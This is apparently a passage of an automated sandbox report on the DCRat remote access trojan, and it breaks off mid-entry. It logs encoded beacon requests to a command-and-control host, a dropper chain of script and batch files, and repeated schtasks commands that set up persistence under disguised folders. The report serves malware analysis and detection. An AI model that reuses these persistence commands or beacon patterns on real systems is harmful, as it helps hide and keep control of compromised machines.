                    Nov 23, 2024 02:21:49.362415075 CET2233OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:21:50.766148090 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.650002185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:21:55.897264004 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:57.261507034 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.650018185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:22:02.985508919 CET2183OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=QX9JiI6ICNwgTNiVDOlJWYiZTMzY2MmBzYwM2MwETMjdDNkRmMlJCLiQTMkFzYkNTZilTMjFDOwczMyQTOiJzYiNWOlljMyE2MhVDOwMWOycjI6ISNwUmMiRjZyIDNiVGNkBjYmJDO1MTZ3M2NwEGO0EmN1ICLiITN1gjZwcTYmdTM4UzN2MjZwQWZxIDNlFjNyIDOhNmYmRTYlBDO4EjI6IyN3ETYjZmZwI2YiVGMjFWMjZGOxUjZwMTOlhTM3YGOjJyes0nIwglT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:22:04.465822935 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:22:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination Port
                    21192.168.2.650029185.114.245.12380
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:22:11.383502960 CET2233OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:22:12.795928001 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:22:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:20:19:58
                    Start date:22/11/2024
                    Path:C:\Users\user\Desktop\DCRatBuild.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\DCRatBuild.exe"
                    Imagebase:0xd60000
                    File size:1'165'973 bytes
                    MD5 hash:A92E55E04CC2026F53C97BDF0E91F6BA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:20:19:58
                    Start date:22/11/2024
                    Path:C:\Windows\SysWOW64\wscript.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe"
                    Imagebase:0x350000
                    File size:147'456 bytes
                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:20:20:03
                    Start date:22/11/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "
                    Imagebase:0x1c0000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:20:20:03
                    Start date:22/11/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:6
                    Start time:20:20:03
                    Start date:22/11/2024
                    Path:C:\ChainBlocksurrogateagentFont\portperf.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\ChainBlocksurrogateagentFont\portperf.exe"
                    Imagebase:0x4e0000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2222640406.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2222640406.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 74%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:7
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:8
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:9
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:10
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:11
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:12
                    Start time:20:20:04
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff642ec0000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:14
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:15
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:16
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:17
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:18
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:19
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:20
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe"
                    Imagebase:0x2c0000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 74%, ReversingLabs
                    Has exited:false

                    General

                    Target ID:21
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:22
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:23
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Users\Default\Videos\dfVXJbANbh.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\Default User\Videos\dfVXJbANbh.exe"
                    Imagebase:0xa40000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2314115683.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2314115683.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 74%, ReversingLabs
                    Has exited:true

                    General

                    Target ID:24
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Program Files\7-Zip\Lang\System.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\7-Zip\Lang\System.exe"
                    Imagebase:0x990000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2314012773.0000000002C76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2314012773.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 74%, ReversingLabs
                    Has exited:true

                    General

                    Target ID:25
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:26
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Program Files\7-Zip\Lang\System.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\7-Zip\Lang\System.exe"
                    Imagebase:0xab0000
                    File size:848'896 bytes
                    MD5 hash:A054982F7E12C1F491ECCD25D9C1B5D7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
